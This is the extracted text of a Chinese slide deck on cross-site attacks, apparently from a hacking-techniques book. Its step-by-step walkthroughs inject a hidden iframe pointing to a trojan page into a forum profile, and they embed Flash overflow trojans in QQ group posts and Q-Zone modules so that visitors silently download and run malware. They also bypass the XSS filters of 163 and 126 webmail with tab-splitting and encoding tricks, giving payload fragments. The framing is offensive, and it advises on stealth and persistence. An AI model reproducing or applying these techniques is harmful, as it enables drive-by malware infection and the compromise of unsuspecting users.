黑客攻防篇-跨网站攻击技术.pptVIP

黑客攻防秘技实战解析（第2版） 跨网站攻击技术 ♂典型的跨站攻击实例演示 ♂跨站攻击技术演变 ♂邮箱跨站攻击 ♂搜索引擎的跨站攻击 典型的跨站攻击实例演示 具体的操作步骤如下： 步骤1：打开动网论坛首页，如图6-1所示。先在论坛注册一个用户，单击【登录】按钮进行登录，登录后的界面如图6-2所示。 典型的跨站攻击实例演示 具体的操作步骤如下： 步骤3：选择【用户控制面板】→【联系资料修改】菜单项，即可打开个人资料修改页面，如图6-3所示。 步骤4：在“论坛密码”栏中输入论坛密码，在“主页地址”栏中输入代码“/ScriptIfRA ME height=0 width=0 sRc=”http//网页木马地址”/IFrAME”。另外，还需要在“MSN号码”栏中输入代码：Script Language=JavaScriptvar actioninfo3=单帖屏蔽，如图6-4所示。 典型的跨站攻击实例演示 具体的操作步骤如下： 步骤5：单击【更新】按钮，即可提交修改资料内容。若提交成功，即可弹出提示信息“你的修改信息已成功提交！”，如图6-5所示。 步骤6：提交成功后返回论坛，回复或新发一篇帖子，帖子的内容可以随意填写。发表成功后再查看新发的帖子，即可发现在新发的帖子页面中已经嵌入了一个网页框架，在框架中显示了“新起点工作室”的页面，如图6-6所示。 跨站攻击技术的演变 不安全的客户端过滤 编辑转换也可以跨站 Flash跳转的跨站攻击 Flash溢出跨站攻击 Flash溢出跨站攻击 1．制作Flash溢出木马 步骤1：打开Icode To SWF工具，单击“SWF文件”后面的【选择】按钮，选择本机上某个正常的Flash文件；在“插入代码”栏中填写刚才的网页木马的链接地址。 步骤2：单击【给我插】按钮，即可将网页木马链接插入到正常的Flash文件中了，如图6-17所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞，对方打开Flash文件后，就会造成IE溢出，自动访问木马网页在后台下载运行网页中的木马程序。 Flash溢出跨站攻击 2．在QQ群中挂马 在新帖页面中单击【插入Flash】按钮，在弹出对话框中输入SWF木马文件的网络链接地址，并设置其尺寸大小，单击【插入】按钮插入Flash文件，如图6-18所示。在发表新帖子后，当有人在QQ群中打开查看这篇帖子时，就会自动播放Flash并在后台下载运行木马服务端了。当然，也可以直接在QQ群中散布SWF木马文件的网址，别人单击后一样会中木马，不过这种方式不如发表帖子隐蔽的效果好，攻击的持续性也不强。 Flash溢出跨站攻击 3．Q-Zone溢出跨站 打开QQ空间后，在页面中单击【自定义】按钮，在自定义工具栏中单击【模块】选项卡，单击【新建模块】按钮，在其中选择新建一个Flash模块，在【添加Flash模块】对话框中的“Flash动画地址”栏中输入Flash溢出木马的网址，如图6-19所示。单击【确认】按钮，即可完成模块的添加。在提交自定义模块代码后，用户进入该QQ空间时会自动打开显示上传的SWF木马Flash，从而在后台下载运行木马服务端程序。 邮箱跨站攻击 邮箱跨站的危害 国内主流邮箱跨站漏洞 1．Tab绕过过滤：163邮箱跨站测试 2．编码转换逃脱过滤：126邮箱的跨站测试 Tab绕过过滤：163邮箱跨站测试 对163邮箱进行跨站的操作步骤如下： 步骤1：登录163免费邮箱，在“收件人”栏中填入要攻击的邮箱地址，主题可以任意填写，单击下方编辑窗口中的【全部功能】按钮展开全部功能项，从功能栏中单击【编辑源码】按钮 ，进入HTML代码编写状态，在其中输入测试代码img src=j ava script:wi ndow.op en()/，如图6-28所示。 步骤2：单击【发送】按钮，即可发送邮件。当用户接收并查看邮件时，即可自动弹出百度的网页窗口，如图6-29所示。 编码转换逃脱过滤：126邮箱的跨站测试 对126邮箱进行跨站的操作步骤如下： 步骤1：登录126免费邮箱，在“收件人”栏中填入要攻击的邮箱地址，主题可任意填写，单击下方编辑窗口中的【全部功能】按钮展开全部功能项，从功能栏中单击【编辑源码】按钮 ，即可进入HTML代码编写状态，在其中输入测试代码，如图6-30所示。 步骤2：在编写完成后，单击【发送】按钮发送邮件，待发送成功后